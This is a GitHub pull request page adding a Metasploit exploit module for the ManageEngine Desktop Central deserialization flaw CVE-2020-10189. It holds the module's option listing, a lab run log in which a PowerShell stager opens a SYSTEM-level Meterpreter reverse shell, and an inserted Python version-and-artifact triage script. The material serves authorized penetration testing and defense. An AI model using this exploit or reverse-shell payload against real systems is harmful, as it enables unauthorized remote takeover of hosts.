
Add ManageEngine Desktop Central exploit (CVE-2020-10189) #13071

Merged
merged 11 commits into from Mar 13, 2020

Conversation


wvu-r7 commented Mar 12, 2020

https://twitter.com/steventseeley/status/1235635108498948096

msf5 exploit(windows/http/desktopcentral_deserialization) > info

       Name: ManageEngine Desktop Central Java Deserialization
     Module: exploit/windows/http/desktopcentral_deserialization
   Platform: Windows
       Arch: cmd, x86, x64
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2020-03-05

Provided by:
  mr_me
  wvu <wvu@metasploit.com>

Module side effects:
 ioc-in-logs
 artifacts-on-disk

Module stability:
 service-resource-loss

Module reliability:
 first-attempt-fail

Available targets:
  Id  Name
  --  ----
  0   Windows Command
  1   Windows Dropper
  2   PowerShell Stager

Check supported:
  Yes

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT      8383             yes       The target port (TCP)
  SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
  SRVPORT    8080             yes       The local port to listen on.
  SSL        true             no        Negotiate SSL/TLS for outgoing connections
  SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
  TARGETURI  /                yes       Base path
  URIPATH                     no        The URI to use for this exploit (default is random)
  VHOST                       no        HTTP server virtual host

Payload information:

Description:
  This module exploits a Java deserialization vulnerability in the
  getChartImage() method from the FileStorage class within
  ManageEngine Desktop Central versions < 10.0.474. Tested against
  10.0.465 x64. "The short-term fix for the arbitrary file upload
  vulnerability was released in build 10.0.474 on January 20, 2020. In
  continuation of that, the complete fix for the remote code execution
  vulnerability is now available in build 10.0.479."

References:
  https://cvedetails.com/cve/CVE-2020-10189/
  https://srcincite.io/advisories/src-2020-0011/
  https://srcincite.io/pocs/src-2020-0011.py.txt
  https://twitter.com/steventseeley/status/1235635108498948096
  https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html

PatchedVersion:
  100474

msf5 exploit(windows/http/desktopcentral_deserialization) >
@wvu-r7 wvu-r7 force-pushed the wvu-r7:feature/manageengine branch 3 times, most recently from 2f3d1b1 to 2cf0df8 Mar 12, 2020
@wvu-r7 wvu-r7 removed the needs-docs label Mar 12, 2020
@wvu-r7 wvu-r7 force-pushed the wvu-r7:feature/manageengine branch from c8cacaa to dd98fa7 Mar 12, 2020
@wvu-r7 wvu-r7 marked this pull request as ready for review Mar 12, 2020
@wvu-r7 wvu-r7 force-pushed the wvu-r7:feature/manageengine branch 2 times, most recently from 93683e7 to dd98fa7 Mar 12, 2020
@wvu-r7 wvu-r7 force-pushed the wvu-r7:feature/manageengine branch from dd98fa7 to ed5dd4d Mar 12, 2020
wvu-r7 added 2 commits Mar 12, 2020
Hat tip @sranjit-r7.
@space-r7 space-r7 added the docs label Mar 13, 2020
@smcintyre-r7 smcintyre-r7 self-assigned this Mar 13, 2020
wvu-r7 added 2 commits Mar 13, 2020
@wvu-r7 wvu-r7 force-pushed the wvu-r7:feature/manageengine branch from 1b8cda3 to c11be38 Mar 13, 2020

smcintyre-r7 commented Mar 13, 2020

Tested all three targets successfully. Thanks for adding the additional CmdStager target and registering TARGETURI, those will both give users a lot more flexibility.

msf5 exploit(windows/http/desktopcentral_deserialization) > exploit

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. 100465 is an exploitable version
[*] Executing PowerShell Stager for windows/x64/meterpreter/reverse_tcp
[*] Uploading serialized payload
[+] Successfully uploaded serialized payload
[*] Deserializing payload
[+] Successfully deserialized payload
[*] Sending stage (206403 bytes) to 192.168.159.133
[*] Meterpreter session 3 opened (192.168.159.128:4444 -> 192.168.159.133:50416) at 2020-03-13 14:38:23 -0400
[!] This exploit may require manual cleanup of '..\webapps\DesktopCentral\_chart\logger.zip' on the target

meterpreter > g
[+] Deleted ..\webapps\DesktopCentral\_chart\logger.zip
etuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DESKTOP-R9TM84E
OS              : Windows 10 (10.0 Build 10586).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > 

Will land this momentarily. Nice job!
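A defender-side triage helper, added here as an example and not part of this pull request or of the Metasploit module. It uses only what the page states: builds below 10.0.474 are vulnerable, 10.0.474 carries the short-term fix and 10.0.479 the complete RCE fix (the module's check prints these in integer form, e.g. 100465 and PatchedVersion 100474), and a run of the module can leave `..\webapps\DesktopCentral\_chart\logger.zip` on the host if cleanup does not run. The mapping from dotted version to integer build, and the choice to report any zip in the `_chart` directory rather than only `logger.zip`, are assumptions of this example; the install tree it scans is constructed in a temporary directory.

```python
"""Triage helpers for CVE-2020-10189 (ManageEngine Desktop Central).

Added example; not code from this pull request or from Metasploit. It relies
on facts stated on the page: builds below 10.0.474 are vulnerable, 10.0.474
carries the short-term fix and 10.0.479 the complete RCE fix, and a run of the
module may leave '..\\webapps\\DesktopCentral\\_chart\\logger.zip' behind.
ASSUMPTION: the dotted-to-integer build mapping (10.0.465 -> 100465) is
inferred from the numbers in the module output, not documented on the page.
"""
import re
import tempfile
from pathlib import Path

SHORT_TERM_FIX_BUILD = 100474  # 10.0.474: fix for the arbitrary file upload
COMPLETE_FIX_BUILD = 100479    # 10.0.479: complete fix for the RCE
# Relative location of the artifact named in the module's cleanup message.
ARTIFACT = Path("webapps") / "DesktopCentral" / "_chart" / "logger.zip"


def build_number(version):
    """Normalise a version given as '10.0.465' or '100465' to the integer build."""
    text = str(version).strip()
    if text.isdigit():
        return int(text)
    match = re.fullmatch(r"(\d+)\.(\d+)\.(\d+)", text)
    if not match:
        raise ValueError("unrecognised Desktop Central version: %r" % (version,))
    major, minor, patch = (int(part) for part in match.groups())
    # ASSUMPTION: major*10000 + minor*1000 + patch reproduces 100465 / 100474.
    return major * 10000 + minor * 1000 + patch


def assess_version(version):
    """Classify an installed build against the fix builds quoted in the module description."""
    build = build_number(version)
    if build < SHORT_TERM_FIX_BUILD:
        return "vulnerable"   # same threshold the module's check uses (PatchedVersion 100474)
    if build < COMPLETE_FIX_BUILD:
        return "partial-fix"  # upload fix only; vendor places the RCE fix in 10.0.479
    return "patched"


def find_artifacts(install_root):
    """List zip files in the _chart directory, where the page says the payload is left.

    The page names only logger.zip. ASSUMPTION: other zips in that directory
    are reported as well so an analyst can review them; they may be benign.
    """
    root = Path(install_root)
    chart_dir = root / ARTIFACT.parent
    if not chart_dir.is_dir():
        return []
    return sorted(p.relative_to(root).as_posix() for p in chart_dir.glob("*.zip"))


def demo_scan():
    """Scan a constructed install tree (temp directory) with the artifact present."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / ARTIFACT).parent.mkdir(parents=True)
        (root / ARTIFACT).write_bytes(b"PK\x03\x04")  # constructed placeholder bytes only
        return find_artifacts(root)


if __name__ == "__main__":
    for v in ("10.0.465", "10.0.474", "10.0.479"):
        print(v, "->", build_number(v), assess_version(v))
    print("artifacts found in constructed tree:", demo_scan())
```

Run it against a real install by calling `find_artifacts` with the product's install root (the directory that contains `webapps`) and `assess_version` with the build shown in the product's about page; a `partial-fix` result means the upload fix is present but the vendor's complete fix in 10.0.479 is not.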

@smcintyre-r7 smcintyre-r7 merged commit 2a5c433 into rapid7:master Mar 13, 2020
3 checks passed
Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Metasploit Automation - Test Execution Successfully completed all tests.
continuous-integration/travis-ci/pr The Travis CI build passed

smcintyre-r7 commented Mar 13, 2020

Release Notes

This adds an RCE module for the ManageEngine Desktop Central Java Deserialization vulnerability identified as CVE-2020-10189.

@wvu-r7 wvu-r7 deleted the wvu-r7:feature/manageengine branch Mar 13, 2020
@tdoan-r7 tdoan-r7 added the rn-modules label Apr 1, 2020
6 participants